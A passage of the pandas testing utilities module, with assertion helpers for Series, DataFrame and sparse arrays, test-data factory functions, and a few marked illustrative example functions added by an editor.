left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
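# --- Editor's illustrative sketch (not part of the original module) ---
# Illustrates the NA handling described in the Notes above: the missing-value
# masks are compared first, then the remaining values as objects. Assumes a
# pandas version where pd.array and the nullable "Int64" dtype are available.
def _example_assert_extension_array_equal():
    left = pd.array([1, 2, None], dtype="Int64")
    right = pd.array([1, 2, None], dtype="Int64")
    assert_extension_array_equal(left, right)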
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
# ToDo: There are some tests using rhs is sparse
# lhs is dense. Should use assert_class_equal in future
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = "{len}, {left}".format(len=len(left), left=left.index)
msg2 = "{len}, {right}".format(len=len(right), right=right.index)
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.index".format(obj=obj),
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left)
and is_categorical_dtype(right)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right)
if check_exact:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
obj="{obj}".format(obj=obj),
)
elif check_datetimelike_compat:
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
if needs_i8_conversion(left) or needs_i8_conversion(right):
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left.values).equals(Index(right.values)):
msg = (
"[datetimelike_compat=True] {left} is not equal to " "{right}."
).format(left=left.values, right=right.values)
raise AssertionError(msg)
else:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
)
elif is_interval_dtype(left) or is_interval_dtype(right):
assert_interval_array_equal(left.array, right.array)
elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
# .values is an ndarray, but ._values is the ExtensionArray.
# TODO: Use .array
assert is_extension_array_dtype(right.dtype)
assert_extension_array_equal(left._values, right._values)
elif (
is_extension_array_dtype(left)
and not is_categorical_dtype(left)
and is_extension_array_dtype(right)
and not is_categorical_dtype(right)
):
assert_extension_array_equal(left.array, right.array)
else:
_testing.assert_almost_equal(
left._internal_get_values(),
right._internal_get_values(),
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj="{obj}".format(obj=obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(
left.values, right.values, obj="{obj} category".format(obj=obj)
)
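# --- Editor's illustrative sketch (not part of the original module) ---
# A relaxed assert_series_equal comparison: identical values with different
# dtypes and names pass once check_dtype and check_names are turned off.
def _example_assert_series_equal_relaxed():
    left = Series([1, 2, 3], name="a")
    right = Series([1.0, 2.0, 3.0], name="b")
    assert_series_equal(left, right, check_dtype=False, check_names=False)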
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. It is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool / string {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical, i.e.
* left.index.names == right.index.names
* left.columns.names == right.columns.names
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas.util.testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
AssertionError: Attributes are different
...
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj,
"{obj} shape mismatch".format(obj=obj),
"{shape!r}".format(shape=left.shape),
"{shape!r}".format(shape=right.shape),
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.index".format(obj=obj),
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.columns".format(obj=obj),
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj="{obj}.iloc[:, {idx}]".format(obj=obj, idx=i),
)
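# --- Editor's illustrative sketch (not part of the original module) ---
# check_like=True reindexes `left` like `right` before comparing, so frames
# that differ only in row/column order still compare equal.
def _example_assert_frame_equal_check_like():
    df1 = DataFrame({"a": [1, 2], "b": [3, 4]}, index=["x", "y"])
    df2 = DataFrame({"b": [4, 3], "a": [2, 1]}, index=["y", "x"])
    assert_frame_equal(df1, df2, check_like=True)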
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left : Index, Series, DataFrame, ExtensionArray, or np.ndarray
right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
**kwargs
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
else:
raise NotImplementedError(type(left))
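# --- Editor's illustrative sketch (not part of the original module) ---
# assert_equal dispatches on the type of `left`, so a single call site can
# cover Index, Series, DataFrame, ExtensionArray and ndarray inputs alike.
def _example_assert_equal_dispatch():
    assert_equal(pd.Index([1, 2]), pd.Index([1, 2]))     # -> assert_index_equal
    assert_equal(Series([1, 2]), Series([1, 2]))         # -> assert_series_equal
    assert_equal(np.array([1, 2]), np.array([1, 2]))     # -> assert_numpy_array_equal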
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
left,
right,
check_dtype=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
):
"""Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
check_dtype : bool, default True
Whether to check the data dtype is identical.
check_kind : bool, default True
Whether to just compare the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
"""
_check_isinstance(left, right, pd.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
if not check_kind:
left_index = left.sp_index.to_block_index()
right_index = right.sp_index.to_block_index()
else:
left_index = left.sp_index
right_index = right.sp_index
if consolidate_block_indices and left.kind == "block":
# we'll probably remove this hack...
left_index = left_index.to_int_index().to_block_index()
right_index = right_index.to_int_index().to_block_index()
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# indices already compare equal; nothing further to check
pass
if check_fill_value:
assert_attr_equal("fill_value", left, right)
if check_dtype:
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, "Did not contain item: '{key!r}'".format(key=k)
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
"Expected object {obj1!r} and object {obj2!r} to be "
"different objects, but they were the same object."
).format(obj1=type(elem1), obj2=type(elem2))
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(np.random.choice(x, k), name=name, **kwargs)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
Returns
-------
DataFrame
The DataFrame has a "timestamp" DatetimeIndex and the columns:
* name : object dtype with string names
* id : int dtype with Poisson-distributed integers (mean 1000)
* x, y : float dtype drawn uniformly from [-1, 1)
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [
makeIntIndex,
makeFloatIndex,
makeStringIndex,
makeUnicodeIndex,
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeBoolIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(N)
data = Index(data, dtype=object)
index = makeStringIndex(N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return {c: Series(randn(N), index=index) for c in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will be repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) == nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
'"{idx_type}" is not a legal value for `idx_type`, '
'use "i"/"f"/"s"/"u"/"dt/"p"/"td".'.format(idx_type=idx_type)
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = "{prefix}_l{i}_g{j}".format(prefix=prefix, i=i, j=j)
cnt[label] = ndupe_l[i]
# cute Counter trick
result = list(sorted(cnt.elements(), key=keyfunc))[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
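# --- Editor's illustrative sketch (not part of the original module) ---
# Builds a 2-level MultiIndex with 4 entries where the first level repeats
# each label twice (ndupe_l=[2]) and default names "#0"/"#1" are generated.
def _example_makeCustomIndex():
    idx = makeCustomIndex(nentries=4, nlevels=2, names=True, ndupe_l=[2])
    assert isinstance(idx, MultiIndex)
    assert list(idx.names) == ["#0", "#1"]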
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
nrows, ncols - number of data rows/cols
c_idx_names, r_idx_names - False/True/list of strings, yields no names,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples:
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: "R{rows}C{cols}".format(rows=r, cols=c)
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingCustomDataframe(
nrows,
ncols,
density=0.9,
random_state=None,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Parameters
----------
density : float, optional
Float in (0, 1) that gives the percentage of non-missing numbers in
the DataFrame.
random_state : {np.random.RandomState, int}, optional
Random number generator or random seed.
See makeCustomDataframe for descriptions of the rest of the parameters.
"""
df = makeCustomDataframe(
nrows,
ncols,
c_idx_names=c_idx_names,
r_idx_names=r_idx_names,
c_idx_nlevels=c_idx_nlevels,
r_idx_nlevels=r_idx_nlevels,
data_gen_f=data_gen_f,
c_ndupe_l=c_ndupe_l,
r_ndupe_l=r_ndupe_l,
dtype=dtype,
c_idx_type=c_idx_type,
r_idx_type=r_idx_type,
)
i, j = _create_missing_idx(nrows, ncols, density, random_state)
df.values[i, j] = np.nan
return df
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
class TestSubDict(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
def optional_args(decorator):
"""allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
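# --- Editor's illustrative sketch (not part of the original module) ---
# Shows that a decorator wrapped in optional_args can be applied both bare
# and with keyword arguments; the `tag` decorator here is hypothetical and
# simply records a label on the decorated function.
def _example_optional_args():
    @optional_args
    def tag(func, label="default"):
        func.label = label
        return func

    @tag
    def plain():
        pass

    @tag(label="special")
    def labelled():
        pass

    assert plain.label == "default"
    assert labelled.label == "special"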
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : str
